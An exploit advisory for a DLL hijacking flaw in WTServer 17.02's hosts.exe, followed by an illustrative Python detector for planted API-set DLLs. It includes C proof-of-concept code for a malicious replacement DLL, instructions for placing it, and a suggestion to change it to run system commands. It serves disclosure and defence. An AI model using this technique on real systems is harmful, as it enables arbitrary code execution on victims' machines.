WTServer 17.02 DLL Hijacking
Posted on 10 March 2017
[+] Title: WTServer-17.02 - DLL Loading Arbitrary Code Execution
[+] Credits / Discovery: Nassim Asrir
[+] Author Email: wassline@gmail.com
[+] Author Company: Henceforth

Vendor:
===============
http://wtserver.wtriple.com/

Download:
===========
https://sourceforge.net/projects/wtnmp/files/latest/download?source=directory

About Product:
===============
WTServer - Nginx MariaDB Redis Php development stack for Windows

A lightweight, fast and stable server stack for developing php mysql applications on windows, based on the excellent webserver Nginx. A lighter alternative to XAMPP and WAMP.

Package contains:
- Nginx 1.11.10 web server
- MariaDB 10.1.21 database server, mysql replacement (32/64bit)
- Redis 3.2 Cache/NoSql, memcached alternative (64bit)
- Php 5.6.30 & PHP 7.0.16 & PHP 7.1.2 scripting language (32/64bit)
- WinSCP SFTP client
- HTTPS using free LetsEncrypt certificates
- Composer dependency manager for php
- Adminer web based database manager
- Reg.php regular expressions tester
- WTServer Manager (32/64bit), formerly known as *wt-nmp*

Vulnerability Type:
===================
DLL Loading Arbitrary Code Execution.

Information:
===================
The "hosts.exe" program is the vulnerable component in WTServer, and the vulnerable DLL is "api-ms-win-appmodel-runtime-l1-1-0.dll".

POC:
===================
Download the POC from GitHub and compile it with "CodeBlocks" or "GCC".

https://gist.github.com/Nassim-Asrir/8f9a97919e84c4cddc491b317672172b

Data:

    // Compile this code and rename it to "api-ms-win-appmodel-runtime-l1-1-0.dll",
    // then copy it to "C:\WTServer\bin\HostsEditor" and launch "hosts.exe".
    // For any information contact me at: wassline@gmail.com
    #include "main.h"
    #include <windows.h>

    #define DllExport __declspec (dllexport)

    // Shows a message box to prove that code inside the DLL was executed.
    int mes()
    {
        MessageBox(0, "DLL Hijacking Vulnerable", "Nassim Asrir", MB_OK);
        return 0;
    }

    // Entry point called by the Windows loader when "hosts.exe" loads the DLL.
    BOOL WINAPI DllMain(HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
    {
        mes();
        return TRUE; // DllMain is declared BOOL and must return a value
    }

- Download the POC, compile it and copy it to "C:\WTServer\bin\HostsEditor", then launch "hosts.exe" and you will see the MessageBox, or you can modify the code to launch a System Command (calc or ....).

CVE Reference:
===============
N/A

Tested on:
===============
Windows 7
Windows XP
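
A defender-side check for the DLL load described in this advisory, added here as an example and not part of the original advisory or the WTServer project. It filters image-load records, assumed to use Sysmon Event ID 7 field names, for API-set-named DLLs loaded from outside the Windows system directories without a trusted signature; the sample records, the signer allow-list and the function names are constructed for illustration.

```python
import ntpath
import re

# API-set style names (api-ms-*, ext-ms-*) are normally resolved by the Windows
# loader itself, so a file with such a name beside an .exe deserves a closer look.
API_SET_NAME = re.compile(r"^(api|ext)-ms-[a-z0-9-]+\.dll$")
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64", r"c:\windows\winsxs")
TRUSTED_SIGNERS = {"microsoft windows", "microsoft corporation"}  # assumed allow-list


def is_suspicious_load(event):
    """True if the record shows an API-set-named DLL loaded from a non-system
    directory without a valid signature from a trusted signer."""
    loaded = ntpath.normcase(event["ImageLoaded"])  # lower-case, backslashes
    if not API_SET_NAME.match(ntpath.basename(loaded)):
        return False
    folder = ntpath.dirname(loaded)
    if any(folder == d or folder.startswith(d + "\\") for d in SYSTEM_DIRS):
        return False
    # Signed app-local copies (for example redistributed runtime DLLs) are skipped.
    trusted = (event.get("Signed", "false").lower() == "true"
               and event.get("SignatureStatus", "").lower() == "valid"
               and event.get("Signature", "").lower() in TRUSTED_SIGNERS)
    return not trusted


def find_planted_dlls(events):
    """Return (process image, loaded DLL) pairs worth investigating."""
    return [(e["Image"], e["ImageLoaded"]) for e in events if is_suspicious_load(e)]


# Constructed sample records (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\WTServer\bin\HostsEditor\hosts.exe", "Signed": "false",
     "ImageLoaded": r"C:\WTServer\bin\HostsEditor\api-ms-win-appmodel-runtime-l1-1-0.dll"},
    {"Image": r"C:\WTServer\bin\HostsEditor\hosts.exe", "Signed": "true",
     "Signature": "Microsoft Windows", "SignatureStatus": "Valid",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll"},
    {"Image": r"C:\Apps\Example\app.exe", "Signed": "true",
     "Signature": "Microsoft Windows", "SignatureStatus": "Valid",
     "ImageLoaded": r"C:\Apps\Example\api-ms-win-crt-runtime-l1-1-0.dll"},
]

if __name__ == "__main__":
    for image, dll in find_planted_dlls(SAMPLE_EVENTS):
        print(f"review: {image} loaded {dll}")
```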